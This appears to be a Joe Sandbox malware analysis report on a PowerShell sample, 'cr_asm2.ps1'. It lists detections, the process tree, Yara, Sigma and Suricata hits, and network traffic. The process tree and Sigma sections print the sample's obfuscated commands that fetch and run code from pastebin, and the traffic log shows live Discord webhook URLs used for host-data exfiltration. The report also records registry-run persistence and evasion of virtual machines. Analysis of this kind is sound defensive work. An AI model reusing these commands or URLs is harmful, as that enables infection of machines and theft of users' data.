Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cr_asm2.ps1

Overview

General Information

Sample name:cr_asm2.ps1
Analysis ID:1534235
MD5:782ab7dfe2568c218f929be60535752f
SHA1:3252fb10a4ba993ecb134278fce66bc7ef70ce3f
SHA256:ddeb810f3a979f027050968ef30cab877299e6586bdfe05b57dd0d311e7e2c02
Tags:Neth3Nps1user-JAMESWT_MHT
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Powershell creates an autostart link
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to open files direct via NTFS file id
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 6636 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm2.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • csc.exe (PID: 4408 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0w3v5ey\j0w3v5ey.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • cvtres.exe (PID: 3236 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6B3F.tmp" "c:\Users\user\AppData\Local\Temp\j0w3v5ey\CSCE8CC0B62BF5148F19D819A5B292CA929.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • attrib.exe (PID: 1312 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
  • forfiles.exe (PID: 5664 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 4268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6708 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 280 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • forfiles.exe (PID: 5844 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 5672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2160 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 5368 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 6636INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xcca07:$b1: ::WriteAllBytes(
  • 0x2daa6:$s1: -join
  • 0x2f7fb:$s1: -join
  • 0x53ece:$s1: -join
  • 0x53f09:$s1: -join
  • 0x53fd2:$s1: -join
  • 0x54000:$s1: -join
  • 0x541b0:$s1: -join
  • 0x541d3:$s1: -join
  • 0x54486:$s1: -join
  • 0x544a7:$s1: -join
  • 0x544d9:$s1: -join
  • 0x54521:$s1: -join
  • 0x5454e:$s1: -join
  • 0x54575:$s1: -join
  • 0x545a0:$s1: -join
  • 0x545bc:$s1: -join
  • 0x54683:$s1: -join
  • 0x54b18:$s1: -join
  • 0x54b3a:$s1: -join
  • 0x54b92:$s1: -join
Process Memory Space: powershell.exe PID: 280INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x25ac6:$b1: ::WriteAllBytes(
  • 0x148c8b:$b1: ::WriteAllBytes(
  • 0x4db0a:$s1: -join
  • 0x89098:$s1: -join
  • 0xe74c1:$s1: -join
  • 0xe7c22:$s1: -join
  • 0xfbb1:$s3: reverse
  • 0x1b4de:$s3: reverse
  • 0x68fae:$s3: reverse
  • 0x6929c:$s3: reverse
  • 0x699b6:$s3: reverse
  • 0x6a16f:$s3: reverse
  • 0x713a8:$s3: reverse
  • 0x717c2:$s3: reverse
  • 0x7234a:$s3: reverse
  • 0x72ff7:$s3: reverse
  • 0x151c05:$s3: reverse
  • 0x15ba0a:$s3: reverse
  • 0x165e0c:$s3: reverse
  • 0x16ca40:$s3: reverse
  • 0x16eb13:$s3: reverse

Other

SourceRuleDescriptionAuthorStrings
amsi64_280.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process
amsi64_5368.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process

Sigma Signatures

System Summary

barindex
Sigma detected: Suspicious PowerShell Parameter Substring
Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', CommandLine: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'", ParentImage: C:\Windows\System32\forfiles.exe, ParentProcessId: 5664, ParentProcessName: forfiles.exe, ProcessCommandLine: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', ProcessId: 6708, ProcessName: powershell.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm2.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm2.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm2.ps1", ProcessId: 6636, ProcessName: powershell.exe
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6636, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0w3v5ey\j0w3v5ey.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0w3v5ey\j0w3v5ey.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm2.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6636, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0w3v5ey\j0w3v5ey.cmdline", ProcessId: 4408, ProcessName: csc.exe
Sigma detected: Dynamic CSharp Compile Artefact
Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6636, TargetFilename: C:\Users\user\AppData\Local\Temp\j0w3v5ey\j0w3v5ey.cmdline
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm2.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm2.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm2.ps1", ProcessId: 6636, ProcessName: powershell.exe

Data Obfuscation

barindex
Sigma detected: Dot net compiler compiles file from suspicious location
Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0w3v5ey\j0w3v5ey.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0w3v5ey\j0w3v5ey.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm2.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6636, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0w3v5ey\j0w3v5ey.cmdline", ProcessId: 4408, ProcessName: csc.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T18:09:35.425890+020028576591A Network Trojan was detected192.168.2.449761162.159.137.232443TCP
2024-10-15T18:09:42.107904+020028576591A Network Trojan was detected192.168.2.449797162.159.137.232443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T18:09:20.291533+020028576581A Network Trojan was detected192.168.2.449737162.159.137.232443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.4:49797 version: TLS 1.2
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb; source: powershell.exe, 0000000A.00000002.2400175802.000001986F9EB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 0000000A.00000002.2397207544.000001986F6B9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbll source: powershell.exe, 0000000A.00000002.2397207544.000001986F6B9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbDH~ source: powershell.exe, 00000000.00000002.2179609797.0000021C771FB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.2180083104.0000021C772BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2478862622.000002D1B80A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2180083104.0000021C7725A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.2477570747.000002D1B808E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000000.00000002.2180083104.0000021C772A4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2399330590.000001986F9C3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb:I source: powershell.exe, 00000000.00000002.2179609797.0000021C771FB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2179609797.0000021C771FB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.2477570747.000002D1B808E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\j0w3v5ey\j0w3v5ey.pdbhPj source: powershell.exe, 00000000.00000002.2150248824.0000021C6001D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbdb( source: powershell.exe, 00000000.00000002.2180083104.0000021C772BA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbn source: powershell.exe, 0000000A.00000002.2400175802.000001986F9EB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbU source: powershell.exe, 0000000A.00000002.2399330590.000001986F979000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb" source: powershell.exe, 00000000.00000002.2179609797.0000021C771FB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: b.pdb source: powershell.exe, 0000000A.00000002.2399330590.000001986F9C3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbll| source: powershell.exe, 0000000F.00000002.2473830787.000002D1B7D30000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdbpdblib.pdb source: powershell.exe, 0000000F.00000002.2478862622.000002D1B80A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb( source: powershell.exe, 00000000.00000002.2180083104.0000021C772BA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb~ source: powershell.exe, 00000000.00000002.2180083104.0000021C772A4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb1934e089 source: powershell.exe, 00000000.00000002.2179609797.0000021C7722F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2178276731.0000021C76F80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2478862622.000002D1B80A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbgz source: powershell.exe, 0000000F.00000002.2477570747.000002D1B808E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000000A.00000002.2399330590.000001986F979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2477570747.000002D1B8039000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.2178276731.0000021C76F80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2179609797.0000021C771FB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\j0w3v5ey\j0w3v5ey.pdb source: powershell.exe, 00000000.00000002.2150248824.0000021C6001D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb:\Pr$ source: powershell.exe, 0000000A.00000002.2400175802.000001986F9EB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbn source: powershell.exe, 00000000.00000002.2180083104.0000021C772BA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.2149302857.0000021C5D032000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2399330590.000001986F9C3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2477570747.000002D1B808E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000000.00000002.2180083104.0000021C772BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2399330590.000001986F979000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbEh source: powershell.exe, 0000000F.00000002.2477570747.000002D1B8062000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbs source: powershell.exe, 0000000A.00000002.2400175802.000001986F9EB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdblp source: powershell.exe, 0000000F.00000002.2477570747.000002D1B808E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Cn.pdb8 source: powershell.exe, 0000000A.00000002.2399330590.000001986F9C3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb source: powershell.exe, 0000000F.00000002.2477570747.000002D1B8062000.00000004.00000020.00020000.00000000.sdmp

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2857658 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Registration : 192.168.2.4:49737 -> 162.159.137.232:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.4:49797 -> 162.159.137.232:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.4:49761 -> 162.159.137.232:443
Connects to a pastebin service (likely for C&C)
Source: unknownDNS query: name: pastebin.com
Source: Joe Sandbox ViewIP Address: 162.159.137.232 162.159.137.232
Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: POST /api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpTODgkBqgFx7seLHmsLq996 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 212Expect: 100-continueConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 297Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 297Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
